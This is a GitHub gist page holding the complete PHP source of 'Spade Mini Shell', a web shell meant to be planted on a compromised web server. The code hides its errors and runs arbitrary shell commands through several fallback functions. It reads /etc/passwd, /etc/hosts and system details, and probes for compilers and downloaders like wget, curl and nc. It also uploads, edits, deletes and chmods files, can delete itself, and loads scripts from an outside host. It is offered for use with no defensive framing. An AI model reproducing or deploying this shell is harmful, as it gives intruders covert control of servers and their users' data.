Skip to content

Instantly share code, notes, and snippets.

@heylastway

heylastway/Spade Mini Shell.php

Created November 1, 2019 13:24
Show Gist options
  • Save heylastway/23583ab6758edb846d72040bf9713a6b to your computer and use it in GitHub Desktop.
Save heylastway/23583ab6758edb846d72040bf9713a6b to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Spade Mini Shell.php
<?php
// Spade's Mini Shell
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors', 0);
@error_reporting(0);
@error_log(false);
$slash = '/';
if(strtolower(substr(PHP_OS,0,3))=='win'){ $os = 'win'; $slash = '\\'; $ox = "Windows";}else{ $os = "nix"; $ox = "Linux"; }
function sanitize($object){
return filter_var(htmlspecialchars($object), FILTER_SANITIZE_STRING);
}
function get_users(){
$users = array();
$user = file("/etc/passwd");
foreach ($user as $userx => $userz) {
$userct = explode(":", $userz);
array_push($users,$userct[0]);
}
if(!$user){
if($open = opendir("/home/")){
while(($file = readdir($open)) !== false){ array_push($users, $file); }
}
closedir($open);
}
$users = implode(', ', $users);
return $users;
}
function exe($cmd){
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
}elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = join("\n", $results);
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
}elseif(function_exists('proc_open')){
$desc = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$handle = proc_open($cmd, $desc, $pipes);
if(is_resource($handle)){
if(function_exists('fread') && function_exists('feof')){
while(!feof($pipes[1])){ $buff .= fread($pipes[1], 512); }
}elseif(function_exists('fgets') && function_exists('feof')){
while(!feof($pipes[1])){ $buff .= fgets($pipes[1], 512); }
}
}
pclose($handle);
}elseif(function_exists('popen')){
$handle = popen($cmd, "r");
if(is_resource($handle)){
if(function_exists('fread') && function_exists('feof')){
while(!feof($handle)){ $buff .= fread($handle, 512); }
}elseif(function_exists('fgets') && function_exists('feof')){
while(!feof($handle)){ $buff .= fgets($handle, 512); }
}
}
pclose($handle);
}
$buff = wordwrap(htmlspecialchars($buff));
return $buff;
}
echo "
<!DOCTYPE html>
<html>
<head>
<link rel=\"shortcut icon\" href=\"http://i.imgur.com/iuhnNKU.png\" />
<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW, NOARCHIVE\" />
<meta name=\"GOOGLEBOT\" content=\"NOINDEX, NOFOLLOW, NOARCHIVE\" />
<meta charset=\"UTF-8\">
<script type=\"text/javascript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js\"></script>
<link href='http://fonts.googleapis.com/css?family=Monoton' rel='stylesheet' type='text/css'>
<title>:~Spade Mini Shell~:</title>
<style>
@import url(\"http://fonts.googleapis.com/css?family=Iceberg:400\");
*, body, html { text-shadow: 0px 0px 1px #141414; cursor: url(http://cur.cursors-4u.net/cursors/cur-9/cur863.ani), url(http://cur.cursors-4u.net/cursors/cur-9/cur863.png), default !important;}
html {font-family: 'Iceberg';}
.chekwa{ display: none;}
.wala { border-bottom: none;}
input { border: none; background: none; font-family: 'Courier New';}
textarea{ background: #111111; font-family: 'Courier New'; font-size: 15px; border: 1px dashed lime; border-radius: 15px; padding: 10px; color: white;}
.submit{ background: lime; color: black; }
select{ background: lime; color: black; font-family: 'Courier New'; border: none;}
option{ font-family: 'Courier New'; background: lime; border: none;}
.titulo {text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none;}
body { background: #111111; color: white; text-align : center;}
.foot{ position: relative; width: 100%; bottom: 0;}
a { color: white; text-decoration: none;}
#details{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px; margin-top: 10px;}
tr:hover { background: #141414;}
a:hover { text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none; }
.lamesa, .mesa { width:100%; padding:4px 0; color:white; font-size:15px;}
.mesa td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top;}
.board {text-align: center;border: 1px solid rgba(255,180,0,0.4);border-radius: 4px;width: 500px;font-family: 'Monoton'}
.board p {font-size: 65px;font-family: 'Monoton', cursive;color: #fff;text-transform: uppercase;padding: 0;margin: 0;}
pre { text-align: left;}
.pare{ border: 1px dashed lime; border-radius: 15px; color: #9b9b9b; font-size: 15px; font-family: 'Courier New'; padding: 15px;}
textarea:focus{ outline: none;}
.piktur { width: 60px; cursor: pointer; opacity: .5; transition: .5s ease-in-out;}
.piktur:hover { opacity: 1; width: 75px;}
code { font-family: monospace; }
</style>";?>
<script type="text/javascript">
$(document).ready(function() {$('#spade').novacancy({'reblinkProbability': 0.1,'blinkMin': 0.2,'blinkMax': 0.6,'loopMin': 8,'loopMax': 10,'color': '#ffffff','glow': ['0 0 80px #ffffff', '0 0 30px #008000', '0 0 6px #0000ff']});
$('#pirates').novacancy({'blink': 1,'off': 1,'color': 'Red','glow': ['0 0 80px Red', '0 0 30px FireBrick', '0 0 6px DarkRed']});});
</script>
<?php echo "
</head>
<body>
<noscript><meta http-equiv=\"refresh\" content=\"0; URL=http://xbox.nu/sssssssssssppppppppppaaaaaaaaaaaadddddddeeeeeeeee.html\"></noscript>
<center><div class=\"board\" style=\"width: 30%;\"><p id=\"spade\">Spade</p><p id=\"pirates\">Mini Shell</p></div></center>
<div id='details'>
<table class=\"lamesa\" cellpadding=\"3\" cellspacing\"1\">
<tr>
<td><font class=\"titulo wala\">Directory:~$</font>&nbsp;";
if(isset($_GET['path'])){
$path = sanitize($_GET['path']);
}else{
$path = sanitize(getcwd());
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$peth){
if($peth == '' && $id == 0){
$a = true;
echo "<a href=\"?path=/\">/</a>";
continue;
}//if
if($peth == '') continue;
echo "<a href='?path=";
for($i=0;$i<=$id;$i++){
echo $paths[$i];
if($i != $id) echo "/";
}//for
echo "'>".$peth."</a>/";
}//foreach
echo "
</td>
</tr>
<tr>
<td>";
if(isset($_FILES['file'])){
if(@copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo "<font color=lime><a href=".sanitize($_FILES['file']['name'])." target='_blank'>File Uploaded!</font><br/>";
}else{
echo "<font color=red>File Not Uploaded!</font><br/>";
}//upload
}//file
echo "
<form method=POST enctype=\"multipart/form-data\"><font class=\"titulo wala\">Upload File<br><label for=\"upload\"><img class=\"piktur\" src=\"http://xbox.nu/upload.png\"><input id=\"upload\" class=\"chekwa\" type=\"file\" name=\"file\"></label><br><input type=\"submit\" class=\"submit\" ";
if(!is_writable($path)){echo "disabled value='Not Writable!' style='background: red;'";}else{ echo "value='Upload!'"; }
echo "
></form>
</td>
</tr><tr><td class=\"wala\">[<a href=".sanitize($_SERVER['PHP_SELF']).">Home</a>]&nbsp;[<a href='?details'>System Details</a>]&nbsp;[<a href='?kill'>Kill Me</a>]</td></tr></table></div><table>";
if(isset($_GET['details'])){
global $os;
$ds = @ini_get("disable_functions");
$show_ds = (!empty($ds)) ? "<font color=red>".sanitize(wordwrap($ds))."</font>" : "<font color=gold>NONE</font>";
echo "</table><div id=\"details\"><table class=\"mesa\" width=100%><center>
<tr><td><h1 class=titulo>System Information</h1></td></tr>
<tr><td><font color=lime>OS</font>:: <font color=gold>".php_uname(s)."</font></td></tr>
<tr><td><font color=lime>PHP Version</font>:: <font color=gold>".phpversion()."</font></td></tr>
<tr><td><font color=lime>Kernel Release</font>:: <font color=gold>".php_uname(r)."</font></td></tr>
<tr><td><font color=lime>Kernel Version</font>:: <font color=gold>".php_uname(v)."</font></td></tr>
<tr><td><font color=lime>Machine</font>:: <font color=gold>".php_uname(m)."</font></td></tr>
<tr><td><font color=lime>Server Software</font>:: <font color=gold>".$_SERVER['SERVER_SOFTWARE']."</font></td></tr>
<tr><td style=\"text-align:left\"><font color=lime>Disabled Functions</font>:: <font color=gold>".wordwrap($show_ds)."</font></td></tr>";
if(function_exists('apache_get_modules')){
echo "<tr><td style=\"text-align:left\"><font color=lime>Loaded Apache Modules</font>:: <pre>";
$apache = implode(', ', apache_get_modules());
echo wordwrap($apache);
echo "</pre></td></tr>";
}//apache
if($os == 'win'){echo "<tr><td style=\"text-align:left\"><font color=lime>Account Settings</font>:: <pre>".exe('net accounts')."</pre></td></tr><tr><td style=\"text-align:left\"><font color=lime>User Accounts</font>:: <pre>".exe('net user')."</pre></td></tr>";}//Windows
if($os == 'nix'){
echo "<tr><td style=\"text-align:left\"><font color=lime>Distro</font>:: <pre>".exe('cat /etc/*-release')."</pre></td></tr>
<tr><td style=\"text-align:left\"><font color=lime>Distro Name</font>:: <pre>".exe('cat /etc/issue.net')."</pre></td></tr>
<tr><td style=\"text-align:left\"><font color=lime>GCC</font>:: <pre>".exe('whereis gcc')."</pre></td></tr>
<tr><td style=\"text-align:left\"><font color=lime>Perl</font>:: <pre>".exe('whereis perl')."</pre></td></tr>
<tr><td style=\"text-align:left\"><font color=lime>Java</font>:: <pre>".exe('whereis java')."</pre></td></tr>
<tr><td style=\"text-align:left\"><font color=lime>Python</font>:: <pre>".exe('whereis python')."</pre></td></tr>
<tr><td style=\"text-align:left\"><font color=lime>Apache</font>:: <pre>".exe('whereis apache')."</pre></td></tr>
<tr><td style=\"text-align:left\"><font color=lime>CPU</font>:: <pre>".exe('cat /proc/cpuinfo')."</pre></td></tr>
<tr><td style=\"text-align:left\"><font color=lime>RAM</font>:: <pre>".exe('free -m')."</pre></td></tr>
<tr><td style=\"text-align:left\"><font color=lime>User Limits</font>:: <pre>".exe('ulimit -a')."</pre></td></tr>
";
$useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$uze=array();
foreach($useful as $uzeful){
if(exe("which $uzeful")){
$uze[]=$uzeful;
}
}
echo "<tr><td style='text-align:left'><font color=lime>Useful</font>::<pre>";
echo implode(', ',$uze);
echo "</pre></td></tr>";
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
$uze=array();
foreach($downloaders as $downloader){
if(exe("which $downloader")){
$uze[]=$downloader;
}
}
echo "<tr><td style='text-align:left'><font color=lime>Downloaders</font>::<pre>";
echo implode(', ',$uze);
echo "</pre></td></tr>";
echo "<tr><td style='text-align:left'><font color=lime>Users</font>::<pre>".wordwrap(get_users())."</pre</font></td></tr>
<tr><td style='text-align:left'><font color=lime>Hosts</font>::<pre>".exe('cat /etc/hosts')."</pre></font></td></tr>";
}//Linux
echo "</table></div>";
}elseif(isset($_GET['kill'])){
$me = sanitize($_SERVER['PHP_SELF']);
$akez = basename($me);
if(unlink($akez)){
echo "<script>alert('Sayonara Suckers .|.')</script><meta http-equiv=\"refresh\" content=\"0; URL=http://xbox.nu/r3dDXDTOOL.swf\">";
}else{ echo "<center><font color=red>Still Alive!</font></center>"; }
}elseif(isset($_GET['filesource'])){
echo "<tr><td class=\"titulo\"><center>Current File:~$&nbsp;".sanitize($_GET['filesource'])."</center></td></tr></table><br/>";
echo "<pre class=\"pare\"><code>".wordwrap(sanitize(file_get_contents($_GET['filesource'])))."</code></pre>";
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo "</table><br><center>".sanitize($_GET['path'])."<br><br>";
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(@chmod($_POST['path'], $_POST['perm'])){
echo "<font color=lime>Permission Changed!</font>";
}else{
echo "<font color=red>Permission Not Change!</font>";
}//change perm * chmod
}//perm
echo "<form method=POST><font class=\"titulo\">Permission:~$&nbsp;</font><input type=\"text\" name=\"perm\" size=\"4\" value='".substr(sprintf('%o', fileperms($_POST['path'])), -4)."'><input type=\"hidden\" name=\"path\" value='".$_POST['path']."'><input type=\"hidden\" name=\"opt\" value=\"chmod\"><input type=\"submit\" class=\"submit\" value=\">>\"></form>";
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo "<font color=lime>File Name Changed!</font><br>";
}else{
echo "<font color=red>File Name Not Change!</font>";
}//rename
$_POST['name'] = $_POST['newname'];
}//rename
echo "<form method=POST><font class=\"titulo\">New Name:~$&nbsp;</font><input name= \"newname\" type=\"text\" size=\"20\" value='".sanitize($_POST['name'])."'><input type=\"hidden\" name=\"path\" value='".sanitize($_POST['path'])."'><input type=\"hidden\" name=\"opt\" value=\"rename\"><input type=\"submit\" class=\"submit\" value=\">>\"></form>";
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['source'])){
$fopen = fopen($_POST['path'], 'w');
if(fwrite($fopen, $_POST['source'])){
echo "<font color=lime>File Editted!</font><br>";
}else{
echo "<font color=red>File Not Editted!</font><br>";
}//fwrite
fclose($fopen);
}//source
echo "<form method=POST><textarea cols=80 rows=20 name=\"source\">".sanitize(file_get_contents($_POST['path']))."</textarea><br><input type=\"hidden\" name=\"path\" value='".sanitize($_POST['path'])."'><input type=\"hidden\" name=\"opt\" value=\"edit\"><input type=\"submit\" class=\"submit\" value=\">>\"></form>";
}//chmod//rename//edit
echo "</center>";
}else{
echo "</table><br></center>";
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo "<font color=lime>Directory Deleted!</font><br>";
}else{
echo "<font color=red>Directory Not Deleted!</font><br>";
}//rmdir
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo "<font color=lime>File Deleted!</font><br>";
}else{
echo "<font color=red>File Not Deleted!</font><br>";
}//unlink
}//dir//file
}//delete
echo "</center>";
$scandir = scandir($path);
echo "
<div class=\"content\" id=\"details\">
<table class=\"lamesa\" cellpadding=\"3\" cellspacing=\"1\">
<tr>
<th><font class=\"titulo\">Name</font></th>
<th><font class=\"titulo\">Size</font></th>
<th><font class=\"titulo\">Permissions</font></th>
<th><font class=\"titulo\">Options</font></th>
</tr>";
foreach($scandir as $dir){
if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
echo "
<tr>
<td><a href=\"?path=".$path."/".$dir."\">".$dir."</a></td>
<td><center>~</center></td>
<td><center>";
if(is_writable($path.'/'.$dir)) echo "<font color=lime>";//is_writable
elseif(!is_readable($path.'/'.$dir)) echo "<font color=red>";//is_readable
echo perms($path.'/'.$dir);
if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo "</font>";
echo "</center></td>
<td><center>
<form method=POST action=\"?option&path=".$path."\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value='".$dir.">
<input type=\"hidden\" name=\"path\" value='".$path."/".$dir.">
<input type=\"submit\" class=\"submit\" value=\">>\">
</form>
</center></td>
</tr>";
}//foreach
echo "
<tr>
<td>----------------</td><td>----------------</td><td>----------------</td><td>----------------</td>
</tr>";
foreach($scandir as $file){
if(!is_file($path.'/'.$file)) continue;//is_file
$size = filesize($path.'/'.$file)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}//size
echo "
<tr>
<td><a href=\"?filesource=".$path."/".$file."&path=".$path."\">".$file."</a></td>
<td><center>".$size."</center></td>
<td><center>";
if(is_writable($path.'/'.$file)) echo "<font color=lime>";//is_writable
elseif(!is_readable($path.'/'.$file)) echo "<font color=red>";//is_readable
echo perms($path.'/'.$file);
if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo "</font>";
echo "</center></td>
<td><center>
<form method=POST action=\"?option&path=".$path."\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"edit\">Edit</option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value='".$file."'>
<input type=\"hidden\" name=\"path\" value='".$path."/".$file."'>
<input type=\"submit\" class=\"submit\" value=\">>\">
</form>
</center></td>
</tr>";
}//foreach
echo "
</table>
</div>";
}//filesource//Delete
echo "
</table>
<script type=\"text/javascript\" src=\"http://xbox.nu/novacancy.js\"></script>
<div class='foot'>
<hr width='80%'>
<footer>&copy; <font color=lime class=titulo>Spade</font> ".date('Y')."</footer>
</div>
</body>
</html>";
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment